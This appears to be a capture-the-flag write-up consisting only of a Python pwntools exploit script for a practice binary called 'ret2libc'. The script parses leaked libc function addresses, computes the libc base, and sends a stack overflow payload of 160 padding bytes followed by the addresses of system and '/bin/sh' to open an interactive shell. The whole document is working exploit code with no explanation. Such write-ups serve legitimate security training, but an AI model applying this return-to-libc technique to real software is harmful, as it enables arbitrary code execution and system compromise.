Rating:


```python
#!/usr/bin/python
from pwn import *
r = process('./ret2libc') # binary name
libc = ELF('/lib/i386-linux-gnu/libc.so.6') # libc name

read_offset = libc.symbols['read']
system_offset = libc.symbols['system']
binsh_offset = list(libc.search('/bin/sh'))[0]

r.recvuntil('puts: ')
puts_addr = int(r.recv(10), 16)
r.recvuntil('fflush ')
fflush_addr = int(r.recv(10), 16)
r.recvuntil('read: ')
read_addr = int(r.recv(10), 16)
r.recvuntil('write: ')
write_addr = int(r.recv(10), 16)
r.recvuntil('useful_string: ')
binsh_addr = int(r.recv(10), 16)

libc_base = read_addr - read_offset
system_addr = libc_base + system_offset
binsh = libc_base + binsh_offset

print hex(puts_addr)
print hex(fflush_addr)
print hex(read_addr)
print hex(write_addr)
print hex(binsh_addr)
print hex(system_addr)
print hex(binsh)

payload = "A"*160
payload += p32(system_addr)
payload += "A"*4
payload += p32(binsh)

r.sendline(payload)
pause()
r.interactive()
```